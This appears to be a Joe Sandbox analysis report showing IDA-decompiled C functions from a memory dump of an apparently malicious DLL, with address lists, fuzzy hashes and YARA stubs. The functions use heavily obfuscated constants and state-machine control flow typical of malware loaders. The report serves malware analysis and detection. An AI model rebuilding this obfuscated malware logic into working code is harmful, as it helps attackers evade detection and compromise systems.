0x00865780
0x00865782
0x00865784
0x00000000
0x00865784
0x0086573a
0x0086573a
0x0086573c
0x00000000
0x0086573e
0x0086574e
0x0086575a
0x0086575a
0x0086573c
0x00865738
0x0086575e
0x00865766
0x00865766
0x0086579d
0x008657a2
0x008657a5
0x008657aa
0x008657aa
0x008657aa
0x00000000

Strings

\Lh, xrefs: 00865706

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: \Lh
API String ID: 0-2235754405
Opcode ID: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
Instruction ID: 4ebd8a146ff99e97e2e5df3d97cd54245b7720559a2e9caa003c2343351d703a
Opcode Fuzzy Hash: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
Instruction Fuzzy Hash: 7F417872208742CFC758CE25D88582BBBE5FFD8318F104A1DF59596260EB75CA09CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0086E640, Relevance: 1.4, Strings: 1, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0086E640(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t68;
				void* _t78;
				signed int _t79;
				void* _t82;
				void* _t97;
				signed int* _t100;

				_t96 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t68);
				_v68 = 0x77f17d;
				_t100 =  &(( &_v88)[4]);
				_v68 = _v68 + 0xffffbc47;
				_v68 = _v68 ^ 0x007a21f6;
				_t97 = 0;
				_v76 = 0xd01664;
				_t82 = 0xf37e824;
				_t79 = 0x2a;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0xc6ac;
				_v76 = _v76 ^ 0x63f53bf0;
				_v84 = 0xca0bb3;
				_v84 = _v84 | 0xec4cd5b6;
				_v84 = _v84 ^ 0xa5b6880a;
				_v84 = _v84 + 0x809e;
				_v84 = _v84 ^ 0x497d3a42;
				_v72 = 0x505b1c;
				_v72 = _v72 | 0xf2745011;
				_v72 = _v72 ^ 0xf27af575;
				_v88 = 0x8ba087;
				_v88 = _v88 + 0x570e;
				_v88 = _v88 + 0xffffc480;
				_v88 = _v88 >> 5;
				_v88 = _v88 ^ 0x00062f0c;
				_v64 = 0x507489;
				_v64 = _v64 + 0x50d6;
				_v64 = _v64 ^ 0x0059b1d9;
				_v80 = 0x3c915f;
				_v80 = _v80 + 0xba86;
				_v80 = _v80 / _t79;
				_v80 = _v80 + 0x3cb0;
				_v80 = _v80 ^ 0x00080f7c;
				do {
					while(_t82 != 0x5422f69) {
						if(_t82 == 0xc053a7e) {
							__eflags = E00879D3E( &_v60, _v64, __eflags, _v80, _t96 + 4);
							_t97 =  !=  ? 1 : _t97;
						} else {
							if(_t82 == 0xe18d46d) {
								_t78 = E00882BF0(_v84,  &_v60, _v72, _v88, _t96);
								_t100 =  &(_t100[3]);
								__eflags = _t78;
								if(__eflags != 0) {
									_t82 = 0xc053a7e;
									continue;
								}
							} else {
								if(_t82 != 0xf37e824) {
									goto L9;
								} else {
									_t82 = 0x5422f69;
									continue;
								}
							}
						}
						L12:
						return _t97;
					}
					E008622A6(_a4, _v68,  &_v60, _v76);
					_t100 =  &(_t100[2]);
					_t82 = 0xe18d46d;
					L9:
					__eflags = _t82 - 0xc897eb;
				} while (__eflags != 0);
				goto L12;
			}

0x0086e647
0x0086e64b
0x0086e64c
0x0086e650
0x0086e651
0x0086e652
0x0086e657
0x0086e65f
0x0086e662
0x0086e66c
0x0086e674
0x0086e676
0x0086e67e
0x0086e68f
0x0086e690
0x0086e694
0x0086e69c
0x0086e6a4
0x0086e6ac
0x0086e6b4
0x0086e6bc
0x0086e6c4
0x0086e6cc
0x0086e6d4
0x0086e6dc
0x0086e6e4
0x0086e6ec
0x0086e6f4
0x0086e6fc
0x0086e701
0x0086e709
0x0086e711
0x0086e719
0x0086e721
0x0086e729
0x0086e73c
0x0086e740
0x0086e748
0x0086e750
0x0086e750
0x0086e756
0x0086e7cf
0x0086e7d1
0x0086e758
0x0086e75e
0x0086e77d
0x0086e782
0x0086e785
0x0086e787
0x0086e789
0x00000000
0x0086e789
0x0086e760
0x0086e766
0x00000000
0x0086e768
0x0086e768
0x00000000
0x0086e768
0x0086e766
0x0086e75e
0x0086e7d5
0x0086e7dd
0x0086e7dd
0x0086e79e
0x0086e7a3
0x0086e7a6
0x0086e7ab
0x0086e7ab
0x0086e7ab
0x00000000

Strings

B:}I, xrefs: 0086E6C4

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: B:}I
API String ID: 0-2889142627
Opcode ID: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
Instruction ID: ddda45394e330cfa0c42ee9e0c51259a3eadc688848a4e40cd56605a765ae9fe
Opcode Fuzzy Hash: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
Instruction Fuzzy Hash: 2F41BB75508342DBD758CF21E98582FBBE4FBD4718F10091DF585922A1EB75CA098F93

Uniqueness

Uniqueness Score: -1.00%

Function 00870ABA, Relevance: 1.3, Strings: 1, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E00870ABA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* _t98;
				signed int _t104;
				signed int _t105;
				intOrPtr _t116;

				_push(0x104);
				_push(_a16);
				_v44 = 0x104;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(0x104);
				_v56 = 0x2049f9;
				_t116 = 0;
				_v52 = 0;
				_v48 = 0;
				_v20 = 0xeb153a;
				_v20 = _v20 | 0xe521a998;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x000387ae;
				_v32 = 0xc4823f;
				_v32 = _v32 + 0xd346;
				_v32 = _v32 ^ 0x00c87855;
				_v28 = 0x319d41;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 ^ 0x000ba15b;
				_v16 = 0x4743d7;
				_t104 = 0x54;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0xf604c8f9;
				_v16 = _v16 ^ 0xf6068564;
				_v24 = 0x18550b;
				_v24 = _v24 ^ 0x1069247b;
				_t105 = 5;
				_v24 = _v24 / _t105;
				_v24 = _v24 ^ 0x03437d28;
				_v36 = 0xafe78e;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xafe5259b;
				_v8 = 0xc66a38;
				_v8 = _v8 ^ 0x50a68901;
				_v8 = _v8 ^ 0x40045619;
				_v8 = _v8 * 0x15;
				_v8 = _v8 ^ 0x584c57e2;
				_v12 = 0xdb79dc;
				_v12 = _v12 << 0xa;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x1655447b;
				_v12 = _v12 ^ 0x796b06cf;
				_v40 = 0x1393c;
				_v40 = _v40 + 0x9e03;
				_v40 = _v40 ^ 0x000e16cd;
				_t98 = E0087F790(_t105, _a12, _v20);
				_t115 = _t98;
				if(_t98 != 0) {
					_t116 = E0086DAAA(_t115, _v24, _v36, _a8, _v8, _t105,  &_v44);
					E00881538(_v12, _v40, _t115);
				}
				return _t116;
			}

0x00870ac7
0x00870ac8
0x00870acb
0x00870ace
0x00870ad1
0x00870ad4
0x00870ad7
0x00870ad8
0x00870ad9
0x00870ade
0x00870ae5
0x00870ae7
0x00870aec
0x00870aef
0x00870af6
0x00870afd
0x00870b01
0x00870b08
0x00870b0f
0x00870b16
0x00870b1d
0x00870b24
0x00870b28
0x00870b2f
0x00870b3b
0x00870b40
0x00870b45
0x00870b4c
0x00870b53
0x00870b5a
0x00870b64
0x00870b6a
0x00870b6d
0x00870b74
0x00870b7b
0x00870b7f
0x00870b86
0x00870b8d
0x00870b94
0x00870b9f
0x00870ba2
0x00870ba9
0x00870bb0
0x00870bb4
0x00870bb8
0x00870bbf
0x00870bc6
0x00870bcd
0x00870bd4
0x00870beb
0x00870bf0
0x00870bf7
0x00870c14
0x00870c1a
0x00870c1f
0x00870c29

Strings

WLX, xrefs: 00870BA2

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: WLX
API String ID: 0-2077286540
Opcode ID: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
Instruction ID: 8849458b7e8452fd5de4f66af90f283460f8a75659a9b572035690db9559d597
Opcode Fuzzy Hash: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
Instruction Fuzzy Hash: C641F1B2D0020DEBCF05DFA5C94A8EEBBB5FB48304F208159E916B7220D3B58A55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0087FBDE, Relevance: 1.3, Strings: 1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0087FBDE() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t97;
				void* _t99;
				intOrPtr _t100;
				signed int _t108;
				signed int _t109;
				void* _t111;

				_v44 = _v44 & 0x00000000;
				_v40 = _v40 & 0x00000000;
				_v48 = 0xd22319;
				_v20 = 0x8c11a4;
				_v20 = _v20 ^ 0x18a8aba7;
				_t108 = 0xa;
				_v20 = _v20 / _t108;
				_v20 = _v20 ^ 0x026f5dce;
				_v16 = 0xc2c77c;
				_t99 = 0xb09cdbf;
				_v16 = _v16 | 0x0f3eeb6c;
				_t109 = 0x25;
				_v16 = _v16 / _t109;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0x16ecca7d;
				_v12 = 0x9a8850;
				_v12 = _v12 * 0x3d;
				_v12 = _v12 + 0xffff2448;
				_v12 = _v12 + 0xffff902b;
				_v12 = _v12 ^ 0x24dbb777;
				_v8 = 0xd2df60;
				_v8 = _v8 + 0xffff203f;
				_v8 = _v8 | 0xa0e0e7e8;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x3c71d6f5;
				_v32 = 0x56890f;
				_v32 = _v32 << 0xa;
				_v32 = _v32 + 0x42ee;
				_v32 = _v32 ^ 0x5a20a45b;
				_v28 = 0x745af2;
				_v28 = _v28 + 0x7057;
				_v28 = _v28 * 0x1d;
				_v28 = _v28 ^ 0x0d34271a;
				_v36 = 0xe2682;
				_v36 = _v36 >> 3;
				_v36 = _v36 ^ 0x000bc26f;
				_v24 = 0x784a24;
				_v24 = _v24 + 0x8efc;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x000a24d7;
				do {
					while(_t99 != 0x4881f76) {
						if(_t99 == 0xb09cdbf) {
							_push(_t99);
							_push(_t99);
							_t97 = E0086C5D8(0x124);
							_t111 = _t111 + 0xc;
							 *0x88621c = _t97;
							_t99 = 0x4881f76;
							continue;
						}
						goto L5;
					}
					_t100 =  *0x88621c; // 0x0
					E00879DF5(_t100 + 4, _v32, _v28, _v36, _v24);
					_t111 = _t111 + 0xc;
					_t99 = 0x6dda74a;
					L5:
				} while (_t99 != 0x6dda74a);
				return 1;
			}

0x0087fbe4
0x0087fbea
0x0087fbee
0x0087fbf5
0x0087fbfc
0x0087fc0b
0x0087fc10
0x0087fc15
0x0087fc21
0x0087fc28
0x0087fc2a
0x0087fc39
0x0087fc41
0x0087fc48
0x0087fc4b
0x0087fc52
0x0087fc5d
0x0087fc60
0x0087fc67
0x0087fc6e
0x0087fc75
0x0087fc7c
0x0087fc83
0x0087fc8a
0x0087fc8e
0x0087fc95
0x0087fc9c
0x0087fca0
0x0087fca7
0x0087fcae
0x0087fcb5
0x0087fcc0
0x0087fcc3
0x0087fcca
0x0087fcd1
0x0087fcd5
0x0087fcdc
0x0087fce3
0x0087fcea
0x0087fcee
0x0087fcf5
0x0087fcf5
0x0087fcfb
0x0087fd09
0x0087fd0a
0x0087fd10
0x0087fd15
0x0087fd18
0x0087fd1d
0x00000000
0x0087fd1d
0x00000000
0x0087fcfb
0x0087fd2a
0x0087fd36
0x0087fd3b
0x0087fd3e
0x0087fd40
0x0087fd40
0x0087fd4d

Strings

$Jx, xrefs: 0087FCDC

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $Jx
API String ID: 0-2488101295
Opcode ID: c3ea8fdf0a01f67ee68d8e7d1e7daa3af5b7456c001967ee4ccffd5839a5ca59
Instruction ID: b2c19e80349a8511487e2d140518541e044bbcdac7826e8e9f0994346032bdc3
Opcode Fuzzy Hash: c3ea8fdf0a01f67ee68d8e7d1e7daa3af5b7456c001967ee4ccffd5839a5ca59
Instruction Fuzzy Hash: BD413471D0021AEBDF08CFA5C98A5EEBBB1FB44318F208199D512B6250D7B85A498F95

Uniqueness

Uniqueness Score: -1.00%

Function 00867078, Relevance: 1.3, Strings: 1, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 34%

			E00867078(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t109;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				void* _t132;
				void* _t133;
				signed int _t134;

				_v12 = 0x8f98c8;
				_v12 = _v12 >> 1;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x6b25fb67;
				_v12 = _v12 ^ 0xa7412f1a;
				_v8 = 0xcf53a8;
				_v8 = _v8 + 0xffff4190;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xcc79c588;
				_v8 = _v8 ^ 0xffd9b9f8;
				_v32 = 0xdc21b3;
				_t133 = __ecx;
				_t113 = 0x53;
				_v32 = _v32 / _t113;
				_v32 = _v32 ^ 0x0002aeef;
				_v20 = 0xa54b66;
				_t114 = 0x25;
				_v20 = _v20 / _t114;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x00488e30;
				_v28 = 0xf9718f;
				_v28 = _v28 | 0xd1e9f83c;
				_v28 = _v28 + 0xbce;
				_v28 = _v28 ^ 0xd1f9aa01;
				_v16 = 0x596927;
				_t115 = 0x70;
				_v16 = _v16 / _t115;
				_t116 = 0x65;
				_v16 = _v16 / _t116;
				_t117 = 0x1e;
				_v16 = _v16 / _t117;
				_v16 = _v16 ^ 0x0002780a;
				_v24 = 0x48f141;
				_v24 = _v24 << 0xe;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x1e282004;
				_v36 = 0x9232a3;
				_t118 = 0x42;
				_push(_t118);
				_v36 = _v36 / _t118;
				_v36 = _v36 ^ 0x00023701;
				_push(_t118);
				_t109 = E0087CCA0(_v24, _v36);
				_push(_t133);
				_t134 = _t109;
				_push(_t134);
				_push(_v16);
				_t132 = 3;
				E0086E404(_v28, _t132);
				 *((short*)(_t133 + _t134 * 2)) = 0;
				return 0;
			}

0x0086707e
0x00867087
0x0086708a
0x0086708e
0x00867095
0x0086709c
0x008670a3
0x008670aa
0x008670ae
0x008670b5
0x008670bc
0x008670ca
0x008670cc
0x008670d1
0x008670d6
0x008670dd
0x008670e7
0x008670ec
0x008670f1
0x008670f5
0x008670fc
0x00867103
0x0086710a
0x00867111
0x00867118
0x00867122
0x00867127
0x0086712f
0x00867134
0x0086713c
0x00867141
0x00867146
0x0086714d
0x00867154
0x00867158
0x0086715b
0x00867162
0x0086716c
0x0086716f
0x00867170
0x00867173
0x00867186
0x0086718d
0x00867192
0x00867193
0x00867195
0x00867196
0x0086719b
0x0086719f
0x008671a9
0x008671b2

Strings

'iY, xrefs: 00867118

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'iY
API String ID: 0-1691070665
Opcode ID: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
Instruction ID: 2cb459c2db94b1503c5abc8106cb336f3413bc0118b85801640c543afa058037
Opcode Fuzzy Hash: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
Instruction Fuzzy Hash: 43414472E00219EBEF08DFA5D84A9EEFBB2FB44304F208059E115BB290D7B55A15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00876187, Relevance: 1.3, Strings: 1, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00876187(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t52;
				void* _t56;
				void* _t58;
				void* _t59;
				void* _t61;
				intOrPtr _t62;
				signed int* _t64;

				_t58 = __ecx;
				_t64 =  &_v36;
				_v12 = 0x9a6334;
				_t59 = 0x428baaa;
				_v8 = 0x1104ea;
				_t62 = 0;
				_v4 = 0;
				_v28 = 0xb15b0c;
				_t61 = __ecx;
				_v28 = _v28 * 0x1d;
				_v28 = _v28 ^ 0xf86649d6;
				_v28 = _v28 ^ 0xec767c96;
				_v36 = 0x38db19;
				_v36 = _v36 ^ 0x5bdda26a;
				_v36 = _v36 + 0xffff005e;
				_v36 = _v36 | 0xaa371973;
				_v36 = _v36 ^ 0xfbf0c1f1;
				_v32 = 0x2e8edf;
				_v32 = _v32 | 0x3500a324;
				_v32 = _v32 ^ 0x353f0f34;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x000af409;
				_v16 = 0xfc04c2;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000f83ee;
				_v20 = 0xce9672;
				_v20 = _v20 | 0xcae5864f;
				_v20 = _v20 ^ 0xcae41209;
				_v24 = 0x20b296;
				_v24 = _v24 | 0x98e19d34;
				_v24 = _v24 ^ 0x98e5764e;
				do {
					while(_t59 != 0x2638d08) {
						if(_t59 == 0x428baaa) {
							_t59 = 0x994f089;
							continue;
						} else {
							if(_t59 == 0x994f089) {
								_push(_t58);
								_t56 = E008707F0();
								_t64 =  &(_t64[1]);
								_t59 = 0x2638d08;
								_t62 = _t62 + _t56;
								continue;
							}
						}
						goto L7;
					}
					_t58 = _t61 + 4;
					_t52 = E0087BE8C(_t58, _v32, _v16, _v20, _v24);
					_t64 =  &(_t64[3]);
					_t59 = 0xb7af90a;
					_t62 = _t62 + _t52;
					L7:
				} while (_t59 != 0xb7af90a);
				return _t62;
			}

0x00876187
0x00876187
0x0087618a
0x00876192
0x00876197
0x008761a2
0x008761a9
0x008761b2
0x008761c0
0x008761c2
0x008761c6
0x008761ce
0x008761d6
0x008761de
0x008761e6
0x008761ee
0x008761f6
0x008761fe
0x00876206
0x0087620e
0x00876216
0x0087621b
0x00876223
0x0087622b
0x00876230
0x00876238
0x00876240
0x00876248
0x00876250
0x00876258
0x00876260
0x00876268
0x00876268
0x00876272
0x0087628f
0x00000000
0x00876274
0x00876276
0x00876280
0x00876281
0x00876286
0x00876289
0x0087628b
0x00000000
0x0087628b
0x00876276
0x00000000
0x00876272
0x00876297
0x008762a6
0x008762ab
0x008762ae
0x008762b3
0x008762b5
0x008762b5
0x008762c6

Strings

^, xrefs: 008761E6

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ^
API String ID: 0-1590793086
Opcode ID: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
Instruction ID: c2564839ab129e3ed37e11d9a096ab73607a1484f1cb3a3463fbdb2920a77c6d
Opcode Fuzzy Hash: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
Instruction Fuzzy Hash: EE3187722093428FC758CF24958500FBBE1FBD4748F108A1DF489A2225E7B5DA1A8BD3

Uniqueness

Uniqueness Score: -1.00%

Function 0087CAD5, Relevance: 1.3, Strings: 1, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0087CAD5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _t69;
				intOrPtr _t76;
				signed int _t78;
				signed int _t86;
				intOrPtr* _t87;

				_t87 = _a8;
				_t86 = _a12;
				_push(_t86);
				_push(_t87);
				_push(_a4);
				E0087FE29(_t69);
				_v32 = _v32 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v36 = 0xc93ec5;
				_a8 = 0xcab84b;
				_a8 = _a8 >> 1;
				_a8 = _a8 | 0xee18e3b9;
				_a8 = _a8 ^ 0xee71da74;
				_v16 = 0x1dfffe;
				_v16 = _v16 | 0x90f94c10;
				_v16 = _v16 ^ 0x90ff99a5;
				_v12 = 0xe4edc;
				_v12 = _v12 ^ 0xcefa836b;
				_v12 = _v12 ^ 0xcefa5bee;
				_a12 = 0xedd33e;
				_a12 = _a12 ^ 0xf7b2c6ca;
				_a12 = _a12 | 0xdc5ffd20;
				_a12 = _a12 ^ 0xadaf2279;
				_a12 = _a12 ^ 0x52f8ee07;
				_v8 = 0x14e12c;
				_t78 = 6;
				_v8 = _v8 * 0xa;
				_v8 = _v8 / _t78;
				_v8 = _v8 ^ 0x002f50e1;
				_v24 = 0x3584ef;
				_v24 = _v24 ^ 0xd7b39bf3;
				_v24 = _v24 ^ 0xd7855a87;
				_v20 = 0x11ef3f;
				_v20 = _v20 ^ 0xad5d4e81;
				_v20 = _v20 ^ 0xad432fff;
				E00870A90(_a8, _v16, _v12, _t86, _a12,  *((intOrPtr*)(_t87 + 4)));
				E0087C9B0(_v8,  *((intOrPtr*)(_t86 + 0x34)), _v24,  *((intOrPtr*)(_t87 + 4)),  *_t87, _v20);
				_t76 =  *((intOrPtr*)(_t87 + 4));
				 *((intOrPtr*)(_t86 + 0x34)) =  *((intOrPtr*)(_t86 + 0x34)) + _t76;
				return _t76;
			}

0x0087cadc
0x0087cae0
0x0087cae3
0x0087cae4
0x0087cae5
0x0087caea
0x0087caef
0x0087caf5
0x0087caf9
0x0087cb00
0x0087cb07
0x0087cb0a
0x0087cb11
0x0087cb18
0x0087cb1f
0x0087cb26
0x0087cb2d
0x0087cb34
0x0087cb3b
0x0087cb42
0x0087cb49
0x0087cb50
0x0087cb57
0x0087cb5e
0x0087cb65
0x0087cb72
0x0087cb73
0x0087cb7b
0x0087cb7e
0x0087cb85
0x0087cb8c
0x0087cb93
0x0087cb9a
0x0087cba1
0x0087cba8
0x0087cbbf
0x0087cbd5
0x0087cbda
0x0087cbe0
0x0087cbe8

Strings

P/, xrefs: 0087CB7E

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: P/
API String ID: 0-4116444305
Opcode ID: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
Instruction ID: a78194a5b8066ffba7f65de2dbd467e02cf404b43467bbde2c9e7184b007330a
Opcode Fuzzy Hash: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
Instruction Fuzzy Hash: 8831437190130AEFCF48CFA5CA0699FBBB1FF44304F108549EA26A6220C3B59B61DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00882B09, Relevance: 1.3, Strings: 1, Instructions: 57
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00882B09(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t59;
				signed int _t68;
				void* _t74;

				_push(_a8);
				_t74 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t59);
				_v8 = 0x93d6ec;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0xffff3f9a;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00010f7f;
				_v16 = 0x446197;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0xffff9430;
				_v16 = _v16 ^ 0x00039bf5;
				_v12 = 0x6cea88;
				_v12 = _v12 >> 1;
				_t68 = 0x54;
				_v12 = _v12 / _t68;
				_v12 = _v12 + 0x3de4;
				_v12 = _v12 ^ 0x00083458;
				_v20 = 0x13246e;
				_v20 = _v20 << 0xf;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x800a585e;
				_v20 = 0x9dc8c5;
				_v20 = _v20 + 0xe5f4;
				_v20 = _v20 + 0xffffcd2d;
				_v20 = _v20 ^ 0x00910c57;
				_v12 = 0x6d0957;
				_v12 = _v12 << 1;
				_v12 = _v12 ^ 0xc39cd689;
				_v12 = _v12 ^ 0x6e460985;
				_v12 = _v12 ^ 0xad0dfd5a;
				return E00870C2A(E008828EB(), _v20, _t68, _v12, _t74);
			}

0x00882b10
0x00882b13
0x00882b15
0x00882b18
0x00882b19
0x00882b1a
0x00882b1f
0x00882b29
0x00882b2f
0x00882b36
0x00882b3a
0x00882b41
0x00882b48
0x00882b4c
0x00882b53
0x00882b5a
0x00882b61
0x00882b69
0x00882b6c
0x00882b6f
0x00882b76
0x00882b7d
0x00882b84
0x00882b88
0x00882b8c
0x00882b93
0x00882b9a
0x00882ba1
0x00882ba8
0x00882baf
0x00882bb6
0x00882bb9
0x00882bc0
0x00882bc7
0x00882bef

Strings

Wm, xrefs: 00882BAF

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Wm
API String ID: 0-1953712011
Opcode ID: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
Instruction ID: 0a96859e04087a5076efb9777ff28100855f3f32d42e4c475a80d11676880e62
Opcode Fuzzy Hash: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
Instruction Fuzzy Hash: 0421F072D00319EBDB559FE4D84A4DEBBB1FB00318F108699E429A6250D3B50B88DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00861CA1, Relevance: .1, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00861CA1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v552;
				signed int _v556;
				intOrPtr _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* _t99;
				void* _t109;
				void* _t112;
				signed int _t126;
				signed int _t127;
				signed int* _t131;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t99);
				_v556 = _v556 & 0x00000000;
